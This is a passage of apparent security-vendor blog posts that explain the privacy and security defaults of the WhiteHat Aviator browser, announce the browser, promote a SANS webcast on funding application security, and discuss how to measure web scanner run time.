    When you visit a website, it can instruct your browser to make potentially dangerous connections to internal IP addresses on your network — IP addresses that could not otherwise be connected to from the outside (NAT). Exploitation may lead to simple reconnaissance of internet networks, or it may permanently compromise your network by overwriting the firmware on the router. Without installing special third-party software, it’s impossible to block any bit of Web code from carrying out browser-based intranet hacking. If Aviator happens to be blocking something you want to be able to get to, Connection Control allows the user to create custom rules — or temporarily use another browser.
  3. Disconnect bundled (Disconnect.me): 
    TL;DR Blocks ads and 3rd-party trackers.

    Essentially every ad on every website your browser encounters is tracking you, storing bits of information about where you go and what you do. These ads, along with invisible 3rd-party trackers, also often carry malware designed to exploit your browser when you load a page, or to try to trick you into installing something should you choose to click on it. Since ads can be authored by anyone, including attackers, both ads and trackers may also harness your browser to hack other systems, hack your intranet, incriminate you, etc. Then of course the visuals in the ads themselves are often distasteful, offensive, and inappropriate, especially for children. To help protect against tracking, login detection and deanonymization, auto cross-site scripting, drive-by-downloads, and evil cross-site request forgery delivered through malicious ads, we bundled in the Disconnect extension, which is specifically designed to block ads and trackers. According to the Chrome web store, over 400,000 people are already using Disconnect to protect their privacy. Whether you use Aviator or not, we recommend that you use Disconnect too (Chrome / Firefox supported). We understand many publishers depend on advertising to fund the content. They also must understand that many who use ad blocking software aren’t necessarily anti-advertising, but more pro security and privacy. Ads are dangerous. Publishers should simply ask visitors to enable ads on the website to support the content they want to see, which Disconnect’s icon makes it easy to do with a couple of mouse-clicks. This puts the power and the choice into the hands of the user, which is where we believe it should be.
  4. Block 3rd-party Cookies: 
    TL;DR Default configuration update. 

    While it’s very nice that cookies, including 3rd-party cookies, are deleted when the browser is closed, it’s even better when 3rd-party cookies are not allowed in the first place. Blocking 3rd-party cookies helps protect against tracking, login detection, and deanonymization during the current browser session.
  5. DuckDuckGo replaces Google search: 
    TL;DR Privacy enhanced replacement for the default search engine. 

    It is well-known that Google search makes the company billions of dollars annually via user advertising and user tracking / profiling. DuckDuckGo promises exactly the opposite, “Search anonymously. Find instantly.” We felt that that was a much better default option. Of course if you prefer another search engine (including Google), you are free to change the setting.
  6. Limit Referer Leaks: 
    TL;DR Referers no longer leak cross-domain, but are only sent same-domain by default. 

    When clicking from one link to the next, browsers will tell the destination website where the click came from via the Referer header (intentionally misspelled). Doing so could possibly leak sensitive information such as the search keywords used, internal IPs/hostnames, session tokens, etc. These leaks are often caused by the referring URL and offer little, if any, benefit to the user. Aviator therefore only sends these headers within the same domain.
  7. Plug-Ins Click-to-Play: 
    TL;DR Default configuration update enabled by default. 

    Plug-ins (E.g. Flash and Java) are a source for tracking, malware exploitation, and general annoyance. Plug-ins often keep their own storage for cookie-like data, which isn’t easy to delete, especially from within the browser. Plug-ins are also a huge attack vector for malware infection. Your browser might be secure, but the plug-ins are not and one must update constantly. Then of course all those annoying sounds and visuals made by plug-ins which are difficult to identify and block once they load. So, we blocked them all by default. When you want to run a plug-in, say on YouTube, just one-click on the puzzle piece. If you want a website to always load the plug-ins, that’s a configuration change as well. “Always allow plug-ins on…”
  8. Limit data leakage to Google: 
    TL;DR Default configuration update.

    In Aviator we’ve disabled “Use a web service to help resolve navigation errors” and “Use a prediction service to help complete searches and URLs typed in the address bar” by default. We also removed all options to sync / login to Google, and the tracking traffic sent to Google upon Chromium installation. For many of the same reasons that we have defaulted to DuckDuckGo as a search engine, we have limited what is sent in the browser to Google to protect your privacy. If you chose to use Google services, that is your choice. If you chose not to though, it can be difficult in some browsers. Again, our mantra is choice – and this gives you the choice.
  9. Do Not Track: 
    TL;DR Default configuration update.

    Enabled by default. While we prefer “Can-Not-Track” to “Do-Not-Track”, we figure it was safe enough to enable the “Do Not Track” signal by default in the event it gains traction.

We so far have appreciated the response to WhiteHat Aviator and welcome additional questions and feedback. Our goal is to continue to make this a better and more secure browser option for consumers. Please continue to spread the word and share your thoughts with us. Please download it and give it a test run. Let us know what you think! Click here to learn more about the Aviator browser.

Introducing WhiteHat Aviator – A Safer Web Browser

Jeremiah Grossman and I have been publicly discussing browser security and privacy, or the lack thereof, for many years. We’ve shared the issues hundreds of times at conferences, in blog posts, on Twitter, in white papers, and in the press. As the adage goes, “If you’re not paying for something, you’re not the customer; you’re the product being sold.” Browsers are no different, and the major vendors (Google, Mozilla, Microsoft) simply don’t want to make the changes necessary to offer a satisfactorily secure and private browser.

Before I go any further, it’s important to understand that it’s NOT that the browser vendors (Google, Mozilla, and Microsoft) don’t grasp or appreciate what plagues their software. They understand the issues quite well. Most of the time they actually nod their heads and even agree with us! This naturally invites the question: “why aren’t the necessary changes made to fix things and protect people?”

The answer is simple. Browser vendors (Google, Mozilla, and Microsoft) choose not to make these changes because doing so would run the risk of hurting their market share and their ability to make money. You see, offering what we believe is a reasonably secure and privacy-protecting browser requires breaking the Web, even though it’s just a little and in ways few people would notice. As just one example of many, let’s discuss the removal of ads.

The online advertising industry is promoted as a means of helping businesses reach an interested target audience. But tens of millions of people find these ads to be annoying at best, and many find them highly objectionable. The targeting and the assumptions behind them are often at fault: children may be exposed to ads for adult sites, and the targeting is often based on bias and stereotypes that can cause offense. Moreover, these ads can be used to track you across the web, are often laden with malicious malware, and can point those who click on them to scams.

One would think that people who don’t want to click on ads are not the kind of people the ad industry wants anyway. So if browser vendors offered a feature capable of blocking ads by default, it would increase the user satisfaction for millions, provide a more secure and privacy-protecting online experience, and ensure that advertisements were seen by people who would react positively, rather than negatively, to the ads. And yet not a single browser vendor offers ad blocking, instead relying on optional third-party plugins, because this breaks their business model and how they make money. Current incentives between the user and browser vendor are misaligned. People simply aren’t safe online when their browser vendor profits from ads.

I could go on and give a dozen more examples like this, but rather than continuing to beat a drum that no one with the power to make the change is willing to listen to – we decided it was time to draw a line in the sand, and to start making the Web work the way we think it should: a way that protects people. That said, I want to share publicly for the first time some details about WhiteHat Aviator, our own full-featured web browser, which was until now a top secret internal project from our WhiteHat Security Labs team. Originally, Aviator started out as an experiment by our Labs team to test our many Web security and privacy theories, but today Aviator is the browser given to all WhiteHat employees. Jeremiah, myself, and many others at WhiteHat use Aviator daily as our primary browser. We’re often asked by those outside the company what browser we use, to which we have answered, “our own.” After years of research, development, and testing we’ve finally arrived at a version that’s mature enough for public consumption (OS X). Now you can use the same browser that we do.

WhiteHat Security has no interest or stake in the online advertising industry, so we can offer a browser free of ulterior motives. What you see is what you get. We aren’t interested in tracking you or your browsing history, or in letting anyone else have that information either.

Aviator is designed for the every day person who really values their online security and privacy:

  • We bundled Aviator with Disconnect to remove ads and tracking
  • Aviator is always in private mode
  • Each tab is sandboxed (a sandbox provides controls to help prevent one program from making changes to others, or to your environment)
  • We strip out referring URLs across domains to protect your privacy
  • Flash and Java are click-to-play – greatly reducing the risk of drive-by downloads
  • We block access to websites behind your firewall to prevent Intranet hacking

Default settings in Aviator are set to protect your security and your privacy.

We hope you enjoy using Aviator as much as we’ve enjoyed building it. If people like it, we will create a Windows version as well and we’ll add additional privacy and security features. Please download it and give it a test run. Let us know what you think! Click here to learn more about the Aviator browser.

Upcoming SANS Webcast: Convincing Management to Fund Application Security

Many security departments struggle tirelessly to obtain adequate budget for security, especially application security. It’s also no secret that security spending priorities are often grossly misaligned with respect to how businesses invest in IT. This is something I’ve discussed on my blog many times in the past.

The sheer lack of resources is a key reason why Web applications have been wide open to exploitation for as long as they’ve existed, and why companies are constantly getting hacked. While many in the industry understand the problem, they struggle justifying the level of funding necessary to protect the software their organizations build or license.

In December 2012, the SANS Institute conducted a survey of 700 organizations on app security programs and practices. That survey revealed that the primary barriers to implementing secure app management programs were “lack of management funding/buy-in,” followed by lack of resources and skills. Those two are pretty closely aligned, don’t you think?

A 2013 Microsoft survey obtained similar results. In it, more than 2,200 IT professionals and 490 developers worldwide were asked about secure development life cycle processes. The top barriers they cited were lack of management approval, lack of training and support, and cost. It’s time we start developing tools and strategies to begin solving this problem.

In a recent CSO article, SANS’ John Pescatore made some excellent points about how security people need to start approaching their relationships with management. Instead of sounding the alarm, they need to focus more on providing solutions. Let’s say that again: bring management BUSINESS SOLUTIONS and not just the problems. John correctly states that a CEO thinks in terms of opportunity costs, so security people need to use a similar mindset when strategizing a budget conversation with a CEO. Doing so does wonders.

Obviously, that’s not nearly enough of an answer to get a productive conversation started. We security people need more examples, business models, cost models, ROI models, real-world examples, and so on. This will be the topic of a webcast I’m co-presenting with John Pescatore, hosted by SANS. If you’d like come and hear us go over the the material, we’d love to have you there! on September 19 1pm EDT (10am PDT). Or, skip the webcast, and just read this whitepaper on the topic.

How Fast is Your Scanner?

Apparently there is some confusion amongst people who are new to web application scanning regarding the “time it takes for a scan to run.” That metric is typically perceived as a delta between the time at which the scanner starts running and the time at which the scanner completes. However, in reality there are different methods of tracking how long a scanner takes to complete, and some are more thorough than others. Probably the two most common methods of thinking about tracking this time are as follows:

  1. The time it takes between when the scanner is started and the time at which the scanner stops.
  2. The time it takes between when the customer begins the process of setting up to be scanned and the time it takes to give results to the customer and all false positives have been removed.

The disparity of these two options can be massive in terms of time, and people’s perception of the duration of a scan.

Unfortunately, there are many variables in this equation which can skew people’s perception of time when making a mental calculation of how long something has taken:

  1. Is this the first time the customer has ever worked with the scanning vendor – meaning early implementation may be messy (sharing credentials, finding the right assets, giving access to the machines and so on)? It may also require ensuring correct hardware and operating system requirements are met, installation of software, licensing, and procuring hardware on the first scan.
  2. Does the scanner require you to manually kick it off each time you want it to run? This can add quite a bit of overhead, simply by not continuously running.
  3. Is there only one site or are there many sites that need to be tested – meaning that there could be a significant advantage involved in a cloud-based scanner where parallelism is easily achieved, compared to a desktop scanner?
  4. Is this internal or external or both – meaning that there may be some VPN or virtual appliance needs involved in setting up and tearing down the scanner? That adds an unknown amount of time, due to the fact that credentials can expire over time, and sometimes it can be quite an ordeal to get login information.
  5. Does the vendor remove false positives for the customer – meaning that if they do not, is there an extra hidden cost for the customer after results have been received?
  6. Does the scanner require manual updating – meaning that between runs or before each run, does it require an update to ensure the latest test cases are being used? This can take minutes to hours depending on a number of variables such as: how easy it is to patch, whether or not the customer or a third party is handling manual updates, what level of access is required, how to share credentials and so on.
  7. Does the vendor integrate with internal trouble ticketing, or does that require manual intervention to copy each vuln and paste it into the trouble ticketing system to begin triaging the vuln?

When timing a scanner it is important to take into account the actual overhead, and therefore cost, of running the scanner. Rather than looking at any one abstract metric, a more thorough analysis is better at identifying cost. So perhaps in the future we should ask a more relevant and useful question. Instead of asking “how long does the scanner take to run” instead we should ask, “how long does it take for us to take action on our actual vulnerabilities using this scanner?”